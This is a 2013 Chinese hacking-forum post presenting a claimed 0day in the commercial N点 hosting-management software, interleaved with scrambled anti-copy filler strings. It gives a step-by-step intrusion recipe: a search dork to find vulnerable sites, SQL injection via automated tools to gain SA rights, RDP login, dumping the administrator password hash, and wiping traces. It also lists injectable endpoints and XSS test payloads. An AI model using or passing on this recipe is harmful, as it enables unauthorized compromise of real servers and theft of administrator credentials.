中国网络渗透测试联盟
标题:
N点商业版漏洞通杀0day以及利用方法
[打印本页]
作者:
admin
时间:
2013-3-3 08:06
标题:
N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西
) W8 g1 v2 @8 U k, r6 H
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
4 k) f; I9 h; E( G
好吧 抱怨一下就行了 接下来关键的时候到了
% _3 y7 U5 l, }3 G! d$ N( y" L
首先百度搜索关键字:inurl: (mmdatabase.asp)
{0 H" X8 O E6 A
我随便列举一个:
www.xxxx.com
1 E/ o7 r* c# z2 W2 j
修改链接:
http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
6 ^2 Q. ^ Q1 \
扔入NBSI 或者啊D等各种傻逼工具后
7 ?9 j& g4 L- T+ k
你们会看到是SA权限
2 {" c+ {2 J2 c
果断3389 上去 hash得到administrator密码
+ Y9 l+ a% u$ n4 D m) x4 [/ T
擦屁股走人~
5 p, E. }( [% b3 c7 i: p: g
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
, z; [0 b+ e& W( d& l
+ f. E( K+ A8 l% z5 R
再附上其他几个漏洞页面
- |. X8 V9 N' \* r: P% x0 s$ S
SQL:
8 ^/ I+ [. [4 Q+ o3 u
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
, m" m' E$ M5 N3 T9 A% q
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
4 n6 w6 G, D7 w& q" J
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
" y7 e7 ~" V* b% Z( c
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
# N: e* ?% {: w) @- A2 y
XSS证明:
: g# ], e6 h+ |. s" j* B6 q; Z
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
) M+ i4 u: n9 C+ b4 [9 Y& x
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
- k( z: x! W* g( I1 W4 J4 y( b
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn
<script>alert(42873)</script>
- R7 W N! O( r" f e
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
0 b8 U% C# ~0 [7 M+ \( T: C% Z, m) ?
还是星外吧 你们懂的
5 s) i. R) F+ g+ _5 i+ t
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
4 o: ~6 U' a: ?
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
T Y/ _$ \0 R2 Z! U9 V1 A/ R- c
——-
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2